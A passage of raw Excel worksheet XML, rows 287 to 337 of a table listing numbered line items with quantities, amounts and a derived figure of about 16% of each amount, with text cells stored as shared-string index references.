      </c>
      <c r="E287" s="238" t="s">
        <v>5330</v>
      </c>
      <c r="F287" s="238" t="s">
        <v>5322</v>
      </c>
      <c r="G287" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H287" s="10">
        <v>34</v>
      </c>
      <c r="I287" s="14">
        <v>2040.63</v>
      </c>
      <c r="J287" s="15">
        <v>326.5088</v>
      </c>
      <c r="K287" s="16"/>
    </row>
    <row r="288" spans="2:11">
      <c r="B288" s="9">
        <v>285</v>
      </c>
      <c r="C288" s="238" t="s">
        <v>5331</v>
      </c>
      <c r="D288" s="238" t="s">
        <v>5332</v>
      </c>
      <c r="E288" s="238" t="s">
        <v>5333</v>
      </c>
      <c r="F288" s="238" t="s">
        <v>5322</v>
      </c>
      <c r="G288" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H288" s="10">
        <v>11</v>
      </c>
      <c r="I288" s="14">
        <v>2000</v>
      </c>
      <c r="J288" s="15">
        <v>320.0032</v>
      </c>
      <c r="K288" s="16"/>
    </row>
    <row r="289" spans="2:11">
      <c r="B289" s="9">
        <v>286</v>
      </c>
      <c r="C289" s="238" t="s">
        <v>5334</v>
      </c>
      <c r="D289" s="238" t="s">
        <v>5335</v>
      </c>
      <c r="E289" s="238" t="s">
        <v>4758</v>
      </c>
      <c r="F289" s="238" t="s">
        <v>5322</v>
      </c>
      <c r="G289" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H289" s="10">
        <v>5</v>
      </c>
      <c r="I289" s="14">
        <v>735.88</v>
      </c>
      <c r="J289" s="15">
        <v>117.744</v>
      </c>
      <c r="K289" s="16"/>
    </row>
    <row r="290" spans="2:11">
      <c r="B290" s="9">
        <v>287</v>
      </c>
      <c r="C290" s="238" t="s">
        <v>5336</v>
      </c>
      <c r="D290" s="9"/>
      <c r="E290" s="238" t="s">
        <v>5337</v>
      </c>
      <c r="F290" s="238" t="s">
        <v>5338</v>
      </c>
      <c r="G290" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H290" s="10">
        <v>30</v>
      </c>
      <c r="I290" s="14">
        <v>1282.05</v>
      </c>
      <c r="J290" s="15">
        <v>205.152</v>
      </c>
      <c r="K290" s="16"/>
    </row>
    <row r="291" spans="2:11">
      <c r="B291" s="9">
        <v>288</v>
      </c>
      <c r="C291" s="238" t="s">
        <v>5340</v>
      </c>
      <c r="D291" s="238" t="s">
        <v>5341</v>
      </c>
      <c r="E291" s="238" t="s">
        <v>5342</v>
      </c>
      <c r="F291" s="238" t="s">
        <v>5343</v>
      </c>
      <c r="G291" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H291" s="10">
        <v>5</v>
      </c>
      <c r="I291" s="14">
        <v>448.72</v>
      </c>
      <c r="J291" s="15">
        <v>71.792</v>
      </c>
      <c r="K291" s="16"/>
    </row>
    <row r="292" spans="2:11">
      <c r="B292" s="9">
        <v>289</v>
      </c>
      <c r="C292" s="238" t="s">
        <v>5344</v>
      </c>
      <c r="D292" s="238" t="s">
        <v>5345</v>
      </c>
      <c r="E292" s="238" t="s">
        <v>5346</v>
      </c>
      <c r="F292" s="238" t="s">
        <v>5347</v>
      </c>
      <c r="G292" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H292" s="10">
        <v>12</v>
      </c>
      <c r="I292" s="14">
        <v>729.06</v>
      </c>
      <c r="J292" s="15">
        <v>116.6592</v>
      </c>
      <c r="K292" s="16"/>
    </row>
    <row r="293" spans="2:11">
      <c r="B293" s="9">
        <v>290</v>
      </c>
      <c r="C293" s="238" t="s">
        <v>5348</v>
      </c>
      <c r="D293" s="238" t="s">
        <v>5349</v>
      </c>
      <c r="E293" s="238" t="s">
        <v>5350</v>
      </c>
      <c r="F293" s="238" t="s">
        <v>5351</v>
      </c>
      <c r="G293" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H293" s="10">
        <v>3</v>
      </c>
      <c r="I293" s="14">
        <v>384.63</v>
      </c>
      <c r="J293" s="15">
        <v>61.5408</v>
      </c>
      <c r="K293" s="16"/>
    </row>
    <row r="294" spans="2:11">
      <c r="B294" s="9">
        <v>291</v>
      </c>
      <c r="C294" s="238" t="s">
        <v>5352</v>
      </c>
      <c r="D294" s="238" t="s">
        <v>5353</v>
      </c>
      <c r="E294" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F294" s="238" t="s">
        <v>3931</v>
      </c>
      <c r="G294" s="237" t="s">
        <v>5137</v>
      </c>
      <c r="H294" s="10">
        <v>94</v>
      </c>
      <c r="I294" s="14">
        <v>642.76</v>
      </c>
      <c r="J294" s="15">
        <v>102.8736</v>
      </c>
      <c r="K294" s="16"/>
    </row>
    <row r="295" spans="2:11">
      <c r="B295" s="9">
        <v>292</v>
      </c>
      <c r="C295" s="238" t="s">
        <v>5355</v>
      </c>
      <c r="D295" s="238" t="s">
        <v>5356</v>
      </c>
      <c r="E295" s="238" t="s">
        <v>5357</v>
      </c>
      <c r="F295" s="238" t="s">
        <v>5358</v>
      </c>
      <c r="G295" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H295" s="10">
        <v>50</v>
      </c>
      <c r="I295" s="14">
        <v>641.03</v>
      </c>
      <c r="J295" s="15">
        <v>102.56</v>
      </c>
      <c r="K295" s="16"/>
    </row>
    <row r="296" spans="2:11">
      <c r="B296" s="9">
        <v>293</v>
      </c>
      <c r="C296" s="238" t="s">
        <v>5359</v>
      </c>
      <c r="D296" s="9"/>
      <c r="E296" s="238" t="s">
        <v>4926</v>
      </c>
      <c r="F296" s="238" t="s">
        <v>5360</v>
      </c>
      <c r="G296" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H296" s="10">
        <v>1</v>
      </c>
      <c r="I296" s="14">
        <v>470.09</v>
      </c>
      <c r="J296" s="15">
        <v>75.2144</v>
      </c>
      <c r="K296" s="16"/>
    </row>
    <row r="297" spans="2:11">
      <c r="B297" s="9">
        <v>294</v>
      </c>
      <c r="C297" s="238" t="s">
        <v>5361</v>
      </c>
      <c r="D297" s="9"/>
      <c r="E297" s="238" t="s">
        <v>4758</v>
      </c>
      <c r="F297" s="238" t="s">
        <v>5362</v>
      </c>
      <c r="G297" s="237" t="s">
        <v>4760</v>
      </c>
      <c r="H297" s="10">
        <v>3</v>
      </c>
      <c r="I297" s="14">
        <v>168.59</v>
      </c>
      <c r="J297" s="15">
        <v>26.976</v>
      </c>
      <c r="K297" s="16"/>
    </row>
    <row r="298" spans="2:11">
      <c r="B298" s="9">
        <v>295</v>
      </c>
      <c r="C298" s="238" t="s">
        <v>5363</v>
      </c>
      <c r="D298" s="9"/>
      <c r="E298" s="238" t="s">
        <v>5364</v>
      </c>
      <c r="F298" s="238" t="s">
        <v>5365</v>
      </c>
      <c r="G298" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H298" s="10">
        <v>30</v>
      </c>
      <c r="I298" s="14">
        <v>769.23</v>
      </c>
      <c r="J298" s="15">
        <v>123.072</v>
      </c>
      <c r="K298" s="16"/>
    </row>
    <row r="299" spans="2:11">
      <c r="B299" s="9">
        <v>296</v>
      </c>
      <c r="C299" s="238" t="s">
        <v>5366</v>
      </c>
      <c r="D299" s="9"/>
      <c r="E299" s="238" t="s">
        <v>5367</v>
      </c>
      <c r="F299" s="238" t="s">
        <v>5368</v>
      </c>
      <c r="G299" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H299" s="10">
        <v>2</v>
      </c>
      <c r="I299" s="14">
        <v>940.17</v>
      </c>
      <c r="J299" s="15">
        <v>150.4288</v>
      </c>
      <c r="K299" s="16"/>
    </row>
    <row r="300" spans="2:11">
      <c r="B300" s="9">
        <v>297</v>
      </c>
      <c r="C300" s="238" t="s">
        <v>5369</v>
      </c>
      <c r="D300" s="9"/>
      <c r="E300" s="238" t="s">
        <v>5370</v>
      </c>
      <c r="F300" s="238" t="s">
        <v>5371</v>
      </c>
      <c r="G300" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H300" s="10">
        <v>4</v>
      </c>
      <c r="I300" s="14">
        <v>512.82</v>
      </c>
      <c r="J300" s="15">
        <v>82.0544</v>
      </c>
      <c r="K300" s="16"/>
    </row>
    <row r="301" spans="2:11">
      <c r="B301" s="9">
        <v>298</v>
      </c>
      <c r="C301" s="238" t="s">
        <v>5372</v>
      </c>
      <c r="D301" s="9"/>
      <c r="E301" s="238" t="s">
        <v>5373</v>
      </c>
      <c r="F301" s="238" t="s">
        <v>5374</v>
      </c>
      <c r="G301" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H301" s="10">
        <v>5</v>
      </c>
      <c r="I301" s="14">
        <v>508.07</v>
      </c>
      <c r="J301" s="15">
        <v>81.288</v>
      </c>
      <c r="K301" s="16"/>
    </row>
    <row r="302" spans="2:11">
      <c r="B302" s="9">
        <v>299</v>
      </c>
      <c r="C302" s="238" t="s">
        <v>5375</v>
      </c>
      <c r="D302" s="238" t="s">
        <v>5376</v>
      </c>
      <c r="E302" s="238" t="s">
        <v>5377</v>
      </c>
      <c r="F302" s="238" t="s">
        <v>5378</v>
      </c>
      <c r="G302" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H302" s="10">
        <v>1</v>
      </c>
      <c r="I302" s="14">
        <v>5556.67</v>
      </c>
      <c r="J302" s="15">
        <v>889.0672</v>
      </c>
      <c r="K302" s="16"/>
    </row>
    <row r="303" spans="2:11">
      <c r="B303" s="9">
        <v>300</v>
      </c>
      <c r="C303" s="238" t="s">
        <v>5379</v>
      </c>
      <c r="D303" s="238" t="s">
        <v>5380</v>
      </c>
      <c r="E303" s="238" t="s">
        <v>5377</v>
      </c>
      <c r="F303" s="238" t="s">
        <v>5381</v>
      </c>
      <c r="G303" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H303" s="10">
        <v>1</v>
      </c>
      <c r="I303" s="14">
        <v>9231.38</v>
      </c>
      <c r="J303" s="15">
        <v>1477.0208</v>
      </c>
      <c r="K303" s="16"/>
    </row>
    <row r="304" spans="2:11">
      <c r="B304" s="9">
        <v>301</v>
      </c>
      <c r="C304" s="238" t="s">
        <v>5382</v>
      </c>
      <c r="D304" s="238" t="s">
        <v>5383</v>
      </c>
      <c r="E304" s="238" t="s">
        <v>5377</v>
      </c>
      <c r="F304" s="238" t="s">
        <v>5384</v>
      </c>
      <c r="G304" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H304" s="10">
        <v>2</v>
      </c>
      <c r="I304" s="14">
        <v>29572.97</v>
      </c>
      <c r="J304" s="15">
        <v>4731.6768</v>
      </c>
      <c r="K304" s="16"/>
    </row>
    <row r="305" spans="2:11">
      <c r="B305" s="9">
        <v>302</v>
      </c>
      <c r="C305" s="238" t="s">
        <v>5385</v>
      </c>
      <c r="D305" s="238" t="s">
        <v>5386</v>
      </c>
      <c r="E305" s="238" t="s">
        <v>5387</v>
      </c>
      <c r="F305" s="238" t="s">
        <v>5388</v>
      </c>
      <c r="G305" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H305" s="10">
        <v>3</v>
      </c>
      <c r="I305" s="14">
        <v>243.01</v>
      </c>
      <c r="J305" s="15">
        <v>38.88</v>
      </c>
      <c r="K305" s="16"/>
    </row>
    <row r="306" spans="2:11">
      <c r="B306" s="9">
        <v>303</v>
      </c>
      <c r="C306" s="238" t="s">
        <v>5389</v>
      </c>
      <c r="D306" s="238" t="s">
        <v>5390</v>
      </c>
      <c r="E306" s="238" t="s">
        <v>5387</v>
      </c>
      <c r="F306" s="238" t="s">
        <v>5391</v>
      </c>
      <c r="G306" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H306" s="10">
        <v>2</v>
      </c>
      <c r="I306" s="14">
        <v>6239.62</v>
      </c>
      <c r="J306" s="15">
        <v>998.3392</v>
      </c>
      <c r="K306" s="16"/>
    </row>
    <row r="307" spans="2:11">
      <c r="B307" s="9">
        <v>304</v>
      </c>
      <c r="C307" s="238" t="s">
        <v>5392</v>
      </c>
      <c r="D307" s="238" t="s">
        <v>5393</v>
      </c>
      <c r="E307" s="238" t="s">
        <v>5394</v>
      </c>
      <c r="F307" s="238" t="s">
        <v>5395</v>
      </c>
      <c r="G307" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H307" s="10">
        <v>1</v>
      </c>
      <c r="I307" s="14">
        <v>3495.73</v>
      </c>
      <c r="J307" s="15">
        <v>559.3168</v>
      </c>
      <c r="K307" s="16"/>
    </row>
    <row r="308" spans="2:11">
      <c r="B308" s="9">
        <v>305</v>
      </c>
      <c r="C308" s="238" t="s">
        <v>5396</v>
      </c>
      <c r="D308" s="238" t="s">
        <v>5397</v>
      </c>
      <c r="E308" s="238" t="s">
        <v>5398</v>
      </c>
      <c r="F308" s="9"/>
      <c r="G308" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H308" s="10">
        <v>1</v>
      </c>
      <c r="I308" s="14">
        <v>175.97</v>
      </c>
      <c r="J308" s="15">
        <v>28.1552</v>
      </c>
      <c r="K308" s="16"/>
    </row>
    <row r="309" spans="2:11">
      <c r="B309" s="9">
        <v>306</v>
      </c>
      <c r="C309" s="238" t="s">
        <v>5399</v>
      </c>
      <c r="D309" s="238" t="s">
        <v>5400</v>
      </c>
      <c r="E309" s="238" t="s">
        <v>5401</v>
      </c>
      <c r="F309" s="238" t="s">
        <v>5402</v>
      </c>
      <c r="G309" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H309" s="10">
        <v>301</v>
      </c>
      <c r="I309" s="14">
        <v>131.61</v>
      </c>
      <c r="J309" s="15">
        <v>21.1904</v>
      </c>
      <c r="K309" s="16"/>
    </row>
    <row r="310" spans="2:11">
      <c r="B310" s="9">
        <v>307</v>
      </c>
      <c r="C310" s="238" t="s">
        <v>5403</v>
      </c>
      <c r="D310" s="238" t="s">
        <v>5404</v>
      </c>
      <c r="E310" s="238" t="s">
        <v>5405</v>
      </c>
      <c r="F310" s="238" t="s">
        <v>5406</v>
      </c>
      <c r="G310" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H310" s="10">
        <v>220</v>
      </c>
      <c r="I310" s="14">
        <v>2222.23</v>
      </c>
      <c r="J310" s="15">
        <v>355.52</v>
      </c>
      <c r="K310" s="16"/>
    </row>
    <row r="311" spans="2:11">
      <c r="B311" s="9">
        <v>308</v>
      </c>
      <c r="C311" s="238" t="s">
        <v>5407</v>
      </c>
      <c r="D311" s="9"/>
      <c r="E311" s="238" t="s">
        <v>5408</v>
      </c>
      <c r="F311" s="9"/>
      <c r="G311" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H311" s="10">
        <v>10</v>
      </c>
      <c r="I311" s="14">
        <v>119.63</v>
      </c>
      <c r="J311" s="15">
        <v>19.136</v>
      </c>
      <c r="K311" s="16"/>
    </row>
    <row r="312" spans="2:11">
      <c r="B312" s="9">
        <v>309</v>
      </c>
      <c r="C312" s="238" t="s">
        <v>5409</v>
      </c>
      <c r="D312" s="238" t="s">
        <v>5410</v>
      </c>
      <c r="E312" s="238" t="s">
        <v>5411</v>
      </c>
      <c r="F312" s="9"/>
      <c r="G312" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H312" s="10">
        <v>75</v>
      </c>
      <c r="I312" s="14">
        <v>432.14</v>
      </c>
      <c r="J312" s="15">
        <v>69.12</v>
      </c>
      <c r="K312" s="16"/>
    </row>
    <row r="313" spans="2:11">
      <c r="B313" s="9">
        <v>310</v>
      </c>
      <c r="C313" s="238" t="s">
        <v>5412</v>
      </c>
      <c r="D313" s="9"/>
      <c r="E313" s="238" t="s">
        <v>5413</v>
      </c>
      <c r="F313" s="9"/>
      <c r="G313" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H313" s="10">
        <v>20</v>
      </c>
      <c r="I313" s="14">
        <v>160</v>
      </c>
      <c r="J313" s="15">
        <v>25.6</v>
      </c>
      <c r="K313" s="16"/>
    </row>
    <row r="314" spans="2:11">
      <c r="B314" s="9">
        <v>311</v>
      </c>
      <c r="C314" s="238" t="s">
        <v>5414</v>
      </c>
      <c r="D314" s="9"/>
      <c r="E314" s="238" t="s">
        <v>5415</v>
      </c>
      <c r="F314" s="9"/>
      <c r="G314" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H314" s="10">
        <v>27</v>
      </c>
      <c r="I314" s="14">
        <v>270</v>
      </c>
      <c r="J314" s="15">
        <v>43.2</v>
      </c>
      <c r="K314" s="16"/>
    </row>
    <row r="315" spans="2:11">
      <c r="B315" s="9">
        <v>312</v>
      </c>
      <c r="C315" s="238" t="s">
        <v>5416</v>
      </c>
      <c r="D315" s="9"/>
      <c r="E315" s="238" t="s">
        <v>5417</v>
      </c>
      <c r="F315" s="9"/>
      <c r="G315" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H315" s="10">
        <v>10</v>
      </c>
      <c r="I315" s="14">
        <v>30</v>
      </c>
      <c r="J315" s="15">
        <v>4.8</v>
      </c>
      <c r="K315" s="16"/>
    </row>
    <row r="316" spans="2:11">
      <c r="B316" s="9">
        <v>313</v>
      </c>
      <c r="C316" s="238" t="s">
        <v>5418</v>
      </c>
      <c r="D316" s="9"/>
      <c r="E316" s="238" t="s">
        <v>5419</v>
      </c>
      <c r="F316" s="9"/>
      <c r="G316" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H316" s="10">
        <v>1</v>
      </c>
      <c r="I316" s="14">
        <v>68.37</v>
      </c>
      <c r="J316" s="15">
        <v>10.9392</v>
      </c>
      <c r="K316" s="16"/>
    </row>
    <row r="317" spans="2:11">
      <c r="B317" s="9">
        <v>314</v>
      </c>
      <c r="C317" s="238" t="s">
        <v>5420</v>
      </c>
      <c r="D317" s="238" t="s">
        <v>5421</v>
      </c>
      <c r="E317" s="238" t="s">
        <v>5422</v>
      </c>
      <c r="F317" s="9"/>
      <c r="G317" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H317" s="10">
        <v>2</v>
      </c>
      <c r="I317" s="14">
        <v>29.06</v>
      </c>
      <c r="J317" s="15">
        <v>4.6496</v>
      </c>
      <c r="K317" s="16"/>
    </row>
    <row r="318" spans="2:11">
      <c r="B318" s="9">
        <v>315</v>
      </c>
      <c r="C318" s="238" t="s">
        <v>5423</v>
      </c>
      <c r="D318" s="238" t="s">
        <v>5424</v>
      </c>
      <c r="E318" s="238" t="s">
        <v>5425</v>
      </c>
      <c r="F318" s="9"/>
      <c r="G318" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H318" s="10">
        <v>2</v>
      </c>
      <c r="I318" s="14">
        <v>95.74</v>
      </c>
      <c r="J318" s="15">
        <v>15.3184</v>
      </c>
      <c r="K318" s="16"/>
    </row>
    <row r="319" spans="2:11">
      <c r="B319" s="9">
        <v>316</v>
      </c>
      <c r="C319" s="238" t="s">
        <v>5426</v>
      </c>
      <c r="D319" s="9"/>
      <c r="E319" s="238" t="s">
        <v>5427</v>
      </c>
      <c r="F319" s="238" t="s">
        <v>5428</v>
      </c>
      <c r="G319" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H319" s="10">
        <v>1</v>
      </c>
      <c r="I319" s="14">
        <v>4957.26</v>
      </c>
      <c r="J319" s="15">
        <v>793.1616</v>
      </c>
      <c r="K319" s="16"/>
    </row>
    <row r="320" spans="2:11">
      <c r="B320" s="9">
        <v>317</v>
      </c>
      <c r="C320" s="238" t="s">
        <v>5429</v>
      </c>
      <c r="D320" s="238" t="s">
        <v>5430</v>
      </c>
      <c r="E320" s="238" t="s">
        <v>5431</v>
      </c>
      <c r="F320" s="9"/>
      <c r="G320" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H320" s="10">
        <v>7</v>
      </c>
      <c r="I320" s="14">
        <v>31.39</v>
      </c>
      <c r="J320" s="15">
        <v>5.0176</v>
      </c>
      <c r="K320" s="16"/>
    </row>
    <row r="321" spans="2:11">
      <c r="B321" s="9">
        <v>318</v>
      </c>
      <c r="C321" s="238" t="s">
        <v>5432</v>
      </c>
      <c r="D321" s="238" t="s">
        <v>5433</v>
      </c>
      <c r="E321" s="238" t="s">
        <v>5434</v>
      </c>
      <c r="F321" s="238" t="s">
        <v>5435</v>
      </c>
      <c r="G321" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H321" s="10">
        <v>15</v>
      </c>
      <c r="I321" s="14">
        <v>611.92</v>
      </c>
      <c r="J321" s="15">
        <v>97.896</v>
      </c>
      <c r="K321" s="16"/>
    </row>
    <row r="322" spans="2:11">
      <c r="B322" s="9">
        <v>319</v>
      </c>
      <c r="C322" s="238" t="s">
        <v>5436</v>
      </c>
      <c r="D322" s="238" t="s">
        <v>5437</v>
      </c>
      <c r="E322" s="238" t="s">
        <v>5438</v>
      </c>
      <c r="F322" s="238" t="s">
        <v>5439</v>
      </c>
      <c r="G322" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H322" s="10">
        <v>1</v>
      </c>
      <c r="I322" s="14">
        <v>128.2</v>
      </c>
      <c r="J322" s="15">
        <v>20.512</v>
      </c>
      <c r="K322" s="16"/>
    </row>
    <row r="323" spans="2:11">
      <c r="B323" s="9">
        <v>320</v>
      </c>
      <c r="C323" s="238" t="s">
        <v>5440</v>
      </c>
      <c r="D323" s="238" t="s">
        <v>5441</v>
      </c>
      <c r="E323" s="238" t="s">
        <v>5442</v>
      </c>
      <c r="F323" s="9"/>
      <c r="G323" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H323" s="10">
        <v>1</v>
      </c>
      <c r="I323" s="14">
        <v>555.56</v>
      </c>
      <c r="J323" s="15">
        <v>88.8896</v>
      </c>
      <c r="K323" s="16"/>
    </row>
    <row r="324" spans="2:11">
      <c r="B324" s="9">
        <v>321</v>
      </c>
      <c r="C324" s="238" t="s">
        <v>5443</v>
      </c>
      <c r="D324" s="9"/>
      <c r="E324" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="F324" s="238" t="s">
        <v>5444</v>
      </c>
      <c r="G324" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H324" s="10">
        <v>1</v>
      </c>
      <c r="I324" s="14">
        <v>282.05</v>
      </c>
      <c r="J324" s="15">
        <v>45.128</v>
      </c>
      <c r="K324" s="16"/>
    </row>
    <row r="325" spans="2:11">
      <c r="B325" s="9">
        <v>322</v>
      </c>
      <c r="C325" s="238" t="s">
        <v>5445</v>
      </c>
      <c r="D325" s="9"/>
      <c r="E325" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="F325" s="238" t="s">
        <v>1093</v>
      </c>
      <c r="G325" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H325" s="10">
        <v>1</v>
      </c>
      <c r="I325" s="14">
        <v>2991.45</v>
      </c>
      <c r="J325" s="15">
        <v>478.632</v>
      </c>
      <c r="K325" s="16"/>
    </row>
    <row r="326" spans="2:11">
      <c r="B326" s="9">
        <v>323</v>
      </c>
      <c r="C326" s="238" t="s">
        <v>5446</v>
      </c>
      <c r="D326" s="238" t="s">
        <v>5447</v>
      </c>
      <c r="E326" s="238" t="s">
        <v>5448</v>
      </c>
      <c r="F326" s="9"/>
      <c r="G326" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H326" s="10">
        <v>6</v>
      </c>
      <c r="I326" s="14">
        <v>476.92</v>
      </c>
      <c r="J326" s="15">
        <v>76.3104</v>
      </c>
      <c r="K326" s="16"/>
    </row>
    <row r="327" spans="2:11">
      <c r="B327" s="9">
        <v>324</v>
      </c>
      <c r="C327" s="238" t="s">
        <v>5449</v>
      </c>
      <c r="D327" s="238" t="s">
        <v>4824</v>
      </c>
      <c r="E327" s="238" t="s">
        <v>1426</v>
      </c>
      <c r="F327" s="238" t="s">
        <v>5450</v>
      </c>
      <c r="G327" s="237" t="s">
        <v>223</v>
      </c>
      <c r="H327" s="10">
        <v>1</v>
      </c>
      <c r="I327" s="14">
        <v>1286.15</v>
      </c>
      <c r="J327" s="15">
        <v>205.784</v>
      </c>
      <c r="K327" s="16"/>
    </row>
    <row r="328" spans="2:11">
      <c r="B328" s="9">
        <v>325</v>
      </c>
      <c r="C328" s="238" t="s">
        <v>5451</v>
      </c>
      <c r="D328" s="238" t="s">
        <v>5452</v>
      </c>
      <c r="E328" s="238" t="s">
        <v>5453</v>
      </c>
      <c r="F328" s="238" t="s">
        <v>5454</v>
      </c>
      <c r="G328" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H328" s="10">
        <v>11</v>
      </c>
      <c r="I328" s="14">
        <v>2467.93</v>
      </c>
      <c r="J328" s="15">
        <v>394.8736</v>
      </c>
      <c r="K328" s="16"/>
    </row>
    <row r="329" spans="2:11">
      <c r="B329" s="9">
        <v>326</v>
      </c>
      <c r="C329" s="238" t="s">
        <v>5455</v>
      </c>
      <c r="D329" s="238" t="s">
        <v>5456</v>
      </c>
      <c r="E329" s="238" t="s">
        <v>5457</v>
      </c>
      <c r="F329" s="238" t="s">
        <v>5458</v>
      </c>
      <c r="G329" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H329" s="10">
        <v>1</v>
      </c>
      <c r="I329" s="14">
        <v>29.91</v>
      </c>
      <c r="J329" s="15">
        <v>4.7856</v>
      </c>
      <c r="K329" s="16"/>
    </row>
    <row r="330" spans="2:11">
      <c r="B330" s="9">
        <v>327</v>
      </c>
      <c r="C330" s="238" t="s">
        <v>5459</v>
      </c>
      <c r="D330" s="238" t="s">
        <v>5460</v>
      </c>
      <c r="E330" s="238" t="s">
        <v>5461</v>
      </c>
      <c r="F330" s="238" t="s">
        <v>5462</v>
      </c>
      <c r="G330" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H330" s="10">
        <v>1</v>
      </c>
      <c r="I330" s="14">
        <v>192.31</v>
      </c>
      <c r="J330" s="15">
        <v>30.7696</v>
      </c>
      <c r="K330" s="16"/>
    </row>
    <row r="331" spans="2:11">
      <c r="B331" s="9">
        <v>328</v>
      </c>
      <c r="C331" s="238" t="s">
        <v>5463</v>
      </c>
      <c r="D331" s="9"/>
      <c r="E331" s="238" t="s">
        <v>5464</v>
      </c>
      <c r="F331" s="9"/>
      <c r="G331" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H331" s="10">
        <v>40</v>
      </c>
      <c r="I331" s="14">
        <v>1196.58</v>
      </c>
      <c r="J331" s="15">
        <v>191.424</v>
      </c>
      <c r="K331" s="16"/>
    </row>
    <row r="332" spans="2:11">
      <c r="B332" s="9">
        <v>329</v>
      </c>
      <c r="C332" s="238" t="s">
        <v>5465</v>
      </c>
      <c r="D332" s="238" t="s">
        <v>5466</v>
      </c>
      <c r="E332" s="238" t="s">
        <v>1878</v>
      </c>
      <c r="F332" s="238" t="s">
        <v>5467</v>
      </c>
      <c r="G332" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H332" s="10">
        <v>4</v>
      </c>
      <c r="I332" s="14">
        <v>484</v>
      </c>
      <c r="J332" s="15">
        <v>77.44</v>
      </c>
      <c r="K332" s="16"/>
    </row>
    <row r="333" spans="2:11">
      <c r="B333" s="9">
        <v>330</v>
      </c>
      <c r="C333" s="238" t="s">
        <v>5468</v>
      </c>
      <c r="D333" s="9"/>
      <c r="E333" s="238" t="s">
        <v>5469</v>
      </c>
      <c r="F333" s="9"/>
      <c r="G333" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H333" s="10">
        <v>2</v>
      </c>
      <c r="I333" s="14">
        <v>2136.75</v>
      </c>
      <c r="J333" s="15">
        <v>341.8816</v>
      </c>
      <c r="K333" s="16"/>
    </row>
    <row r="334" spans="2:11">
      <c r="B334" s="9">
        <v>331</v>
      </c>
      <c r="C334" s="238" t="s">
        <v>5470</v>
      </c>
      <c r="D334" s="238" t="s">
        <v>5471</v>
      </c>
      <c r="E334" s="238" t="s">
        <v>5457</v>
      </c>
      <c r="F334" s="238" t="s">
        <v>5472</v>
      </c>
      <c r="G334" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H334" s="10">
        <v>2</v>
      </c>
      <c r="I334" s="14">
        <v>247.87</v>
      </c>
      <c r="J334" s="15">
        <v>39.6608</v>
      </c>
      <c r="K334" s="16"/>
    </row>
    <row r="335" spans="2:11">
      <c r="B335" s="9">
        <v>332</v>
      </c>
      <c r="C335" s="238" t="s">
        <v>5473</v>
      </c>
      <c r="D335" s="238" t="s">
        <v>5474</v>
      </c>
      <c r="E335" s="238" t="s">
        <v>5475</v>
      </c>
      <c r="F335" s="238" t="s">
        <v>5476</v>
      </c>
      <c r="G335" s="237" t="s">
        <v>2125</v>
      </c>
      <c r="H335" s="10">
        <v>5</v>
      </c>
      <c r="I335" s="14">
        <v>180.18</v>
      </c>
      <c r="J335" s="15">
        <v>28.832</v>
      </c>
      <c r="K335" s="16"/>
    </row>
    <row r="336" spans="2:11">
      <c r="B336" s="9">
        <v>333</v>
      </c>
      <c r="C336" s="238" t="s">
        <v>5477</v>
      </c>
      <c r="D336" s="9"/>
      <c r="E336" s="238" t="s">
        <v>5478</v>
      </c>
      <c r="F336" s="238" t="s">
        <v>5479</v>
      </c>
      <c r="G336" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H336" s="10">
        <v>1</v>
      </c>
      <c r="I336" s="14">
        <v>779.49</v>
      </c>
      <c r="J336" s="15">
        <v>124.7184</v>
      </c>
      <c r="K336" s="16"/>
    </row>
    <row r="337" spans="2:11">
      <c r="B337" s="9">
        <v>334</v>
      </c>
      <c r="C337" s="238" t="s">
        <v>5480</v>
      </c>
      <c r="D337" s="238" t="s">
        <v>5481</v>
      </c>
      <c r="E337" s="238" t="s">
        <v>5482</v>
      </c>
      <c r="F337" s="238" t="s">
        <v>5483</v>
      </c>
      <c r="G337" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H337" s="10">
        <v>1</v>
      </c>
      <c r="I337" s="14">
        <v>141.02</v>
      </c>
      <c r="J337" s="15">
        <v>22.5632</v>
      </c>
